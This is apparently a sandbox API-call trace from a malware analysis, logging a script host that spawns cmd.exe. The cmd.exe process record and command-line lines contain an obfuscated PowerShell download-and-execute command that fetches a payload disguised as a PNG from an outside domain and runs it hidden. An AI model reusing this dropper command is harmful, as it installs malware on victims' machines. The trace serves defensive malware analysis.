	[0070.781] SendMessageA (hWnd=0x2022c, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0070.781] PostMessageA (hWnd=0x2022c, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0070.783] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x22f960*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0070.783] CloseHandle (hObject=0xd4) returned 1
	[0070.783] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.783] IUnknown:Release (This=0x3de5f0) returned 0x0
	[0070.783] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.783] IUnknown:Release (This=0x3de6a0) returned 0x0
	[0070.783] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.783] IUnknown:Release (This=0x3de750) returned 0x0
	[0070.783] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.783] IUnknown:Release (This=0x3de540) returned 0x0
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] GetProcessHeap () returned 0x3b0000
	[0070.784] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x41af30 | out: hHeap=0x3b0000) returned 1
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x22f990 | out: lplpMessageFilter=0x22f990*=0x2b5f80) returned 0x0
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.784] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.785] CoUninitialize () 
	[0070.785] DllCanUnloadNow () returned 0x0
	[0070.785] DllCanUnloadNow () returned 0x0
	[0070.785] DllCanUnloadNow () returned 0x1
	[0070.786] free (_Block=0x56b970) 
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??2@YAPEAX_K@Z () returned 0x4d4590
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301
	[0070.788] ??3@YAXPEAX@Z () returned 0x17d00050001
	[0070.788] ??3@YAXPEAX@Z () returned 0x64fac301

Thread:
	id = 135
	os_tid = 0xaec


Thread:
	id = 136
	os_tid = 0xb08

	[0067.919] GetClassInfoA (in: hInstance=0xffdb0000, lpClassName="WSH-Timer", lpWndClass=0x28afe50 | out: lpWndClass=0x28afe50) returned 0
	[0067.920] RegisterClassA (lpWndClass=0x28afe50) returned 0x9006ac138
	[0067.931] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffdb0000, lpParam=0x2b5a60) returned 0x2022c
	[0067.931] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x0
	[0067.931] NtdllDefWindowProc_A (hWnd=0x2022c, Msg=0x24, wParam=0x0, lParam=0x28af840) returned 0x0
	[0067.932] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x0
	[0067.932] SetWindowLongPtrA (hWnd=0x2022c, nIndex=-21, dwNewLong=0x2b5a60) returned 0x0
	[0067.932] NtdllDefWindowProc_A (hWnd=0x2022c, Msg=0x81, wParam=0x0, lParam=0x28af800) returned 0x1
	[0067.933] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x2b5a60
	[0067.933] NtdllDefWindowProc_A (hWnd=0x2022c, Msg=0x83, wParam=0x0, lParam=0x28af860) returned 0x0
	[0067.935] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x2b5a60
	[0067.935] NtdllDefWindowProc_A (hWnd=0x2022c, Msg=0x1, wParam=0x0, lParam=0x28af800) returned 0x0
	[0067.935] SetEvent (hEvent=0xcc) returned 1
	[0068.014] GetMessageA (in: lpMsg=0x28afe20, hWnd=0x2022c, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x28afe20) returned 0
	[0070.779] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x2b5a60
	[0070.781] GetWindowLongPtrA (hWnd=0x2022c, nIndex=-21) returned 0x2b5a60

Thread:
	id = 137
	os_tid = 0xa04


Thread:
	id = 138
	os_tid = 0xb0c


Thread:
	id = 139
	os_tid = 0x9ec


Thread:
	id = 140
	os_tid = 0xa00


Thread:
	id = 141
	os_tid = 0xa0c


Thread:
	id = 142
	os_tid = 0xb28


Thread:
	id = 143
	os_tid = 0xb7c


Process:
	id = "16"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x538de000"
	os_pid = "0xba0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "15"
	os_parent_pid = "0x1ec"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 144
	os_tid = 0xb8c

	[0071.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fb00 | out: lpSystemTimeAsFileTime=0x25fb00*(dwLowDateTime=0xa2f746b0, dwHighDateTime=0x1d543d1)) 
	[0071.342] GetCurrentProcessId () returned 0xba0
	[0071.342] GetCurrentThreadId () returned 0xb8c
	[0071.342] GetTickCount () returned 0x22931
	[0071.342] QueryPerformanceCounter (in: lpPerformanceCount=0x25fb08 | out: lpPerformanceCount=0x25fb08*=19576788319) returned 1
	[0071.343] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0071.343] __set_app_type (_Type=0x1) 
	[0071.343] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0071.343] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0071.344] GetCurrentThreadId () returned 0xb8c
	[0071.344] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) returned 0x3c
	[0071.344] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0071.344] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0071.344] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0071.344] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0071.344] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa98 | out: phkResult=0x25fa98*=0x0) returned 0x2
	[0071.345] VirtualQuery (in: lpAddress=0x25fa80, lpBuffer=0x25fa00, dwLength=0x30 | out: lpBuffer=0x25fa00*(BaseAddress=0x25f000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0071.345] VirtualQuery (in: lpAddress=0x160000, lpBuffer=0x25fa00, dwLength=0x30 | out: lpBuffer=0x25fa00*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0071.345] VirtualQuery (in: lpAddress=0x161000, lpBuffer=0x25fa00, dwLength=0x30 | out: lpBuffer=0x25fa00*(BaseAddress=0x161000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0071.345] VirtualQuery (in: lpAddress=0x164000, lpBuffer=0x25fa00, dwLength=0x30 | out: lpBuffer=0x25fa00*(BaseAddress=0x164000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0071.345] VirtualQuery (in: lpAddress=0x260000, lpBuffer=0x25fa00, dwLength=0x30 | out: lpBuffer=0x25fa00*(BaseAddress=0x260000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0071.345] GetConsoleOutputCP () returned 0x1b5
	[0071.345] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0071.345] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0071.345] _get_osfhandle (_FileHandle=1) returned 0x7
	[0071.345] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0071.346] _get_osfhandle (_FileHandle=1) returned 0x7
	[0071.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0071.346] _get_osfhandle (_FileHandle=1) returned 0x7
	[0071.346] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0071.347] _get_osfhandle (_FileHandle=0) returned 0x3
	[0071.347] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0071.347] _get_osfhandle (_FileHandle=0) returned 0x3
	[0071.347] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0071.347] GetEnvironmentStringsW () returned 0x468f20*
	[0071.348] GetProcessHeap () returned 0x450000
	[0071.348] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xad4) returned 0x469a00
	[0071.348] FreeEnvironmentStringsW (penv=0x468f20) returned 1
	[0071.348] GetProcessHeap () returned 0x450000
	[0071.348] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x8) returned 0x4687a0
	[0071.348] GetEnvironmentStringsW () returned 0x468f20*
	[0071.348] GetProcessHeap () returned 0x450000
	[0071.348] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xad4) returned 0x46a4e0
	[0071.348] FreeEnvironmentStringsW (penv=0x468f20) returned 1
	[0071.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25e958 | out: phkResult=0x25e958*=0x44) returned 0x0
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x18, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x1, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x1, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x0, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x40, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x40, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.348] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x40, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.348] RegCloseKey (hKey=0x44) returned 0x0
	[0071.349] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25e958 | out: phkResult=0x25e958*=0x44) returned 0x0
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x40, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x1, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x1, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x0, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x9, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x4, lpData=0x25e970*=0x9, lpcbData=0x25e954*=0x4) returned 0x0
	[0071.349] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25e950, lpData=0x25e970, lpcbData=0x25e954*=0x1000 | out: lpType=0x25e950*=0x0, lpData=0x25e970*=0x9, lpcbData=0x25e954*=0x1000) returned 0x2
	[0071.349] RegCloseKey (hKey=0x44) returned 0x0
	[0071.349] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e55
	[0071.349] srand (_Seed=0x5d3b2e55) 
	[0071.349] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0071.349] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0071.349] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0071.349] GetProcessHeap () returned 0x450000
	[0071.349] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x218) returned 0x468f20
	[0071.349] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x468f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0071.350] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0071.350] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0071.350] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0071.350] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0071.350] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0071.350] GetProcessHeap () returned 0x450000
	[0071.350] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x469a00 | out: hHeap=0x450000) returned 1
	[0071.350] GetEnvironmentStringsW () returned 0x469140*
	[0071.350] GetProcessHeap () returned 0x450000
	[0071.350] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xaec) returned 0x46bad0
	[0071.350] FreeEnvironmentStringsW (penv=0x469140) returned 1
	[0071.350] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0071.350] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0071.350] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0071.350] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0071.350] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0071.350] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0071.350] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0071.350] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0071.351] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0071.351] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0071.351] GetProcessHeap () returned 0x450000
	[0071.351] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x48) returned 0x468d80
	[0071.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x25f760 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0071.351] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x25f760, lpFilePart=0x25f740 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x25f740*="Documents") returned 0x1b
	[0071.351] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0071.351] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x25f470 | out: lpFindFileData=0x25f470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x46c5d0
	[0071.351] FindClose (in: hFindFile=0x46c5d0 | out: hFindFile=0x46c5d0) returned 1
	[0071.351] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x25f470 | out: lpFindFileData=0x25f470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x46c5d0
	[0071.351] FindClose (in: hFindFile=0x46c5d0 | out: hFindFile=0x46c5d0) returned 1
	[0071.351] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x25f470 | out: lpFindFileData=0x25f470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x46c5d0
	[0071.351] FindClose (in: hFindFile=0x46c5d0 | out: hFindFile=0x46c5d0) returned 1
	[0071.351] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0071.351] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0071.352] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0071.352] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bad0 | out: hHeap=0x450000) returned 1
	[0071.352] GetEnvironmentStringsW () returned 0x46afd0*
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb2c) returned 0x46bb10
	[0071.352] FreeEnvironmentStringsW (penv=0x46afd0) returned 1
	[0071.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468d80 | out: hHeap=0x450000) returned 1
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4016) returned 0x46c650
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x260) returned 0x469c80
	[0071.352] GetProcessHeap () returned 0x450000
	[0071.352] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c650 | out: hHeap=0x450000) returned 1
	[0071.352] GetConsoleOutputCP () returned 0x1b5
	[0071.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0071.353] GetUserDefaultLCID () returned 0x409
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x25f870, cchData=128 | out: lpLCData="0") returned 2
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x25f870, cchData=128 | out: lpLCData="0") returned 2
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x25f870, cchData=128 | out: lpLCData="1") returned 2
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0071.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0071.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0071.354] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0071.354] GetProcessHeap () returned 0x450000
	[0071.354] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20c) returned 0x469f60
	[0071.354] GetConsoleTitleW (in: lpConsoleTitle=0x469f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0071.355] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0071.355] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0071.355] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0071.355] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0071.355] GetProcessHeap () returned 0x450000
	[0071.355] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4012) returned 0x46c650
	[0071.355] GetProcessHeap () returned 0x450000
	[0071.355] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4010) returned 0x470670
	[0071.355] GetProcessHeap () returned 0x450000
	[0071.355] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a) returned 0x4649a0
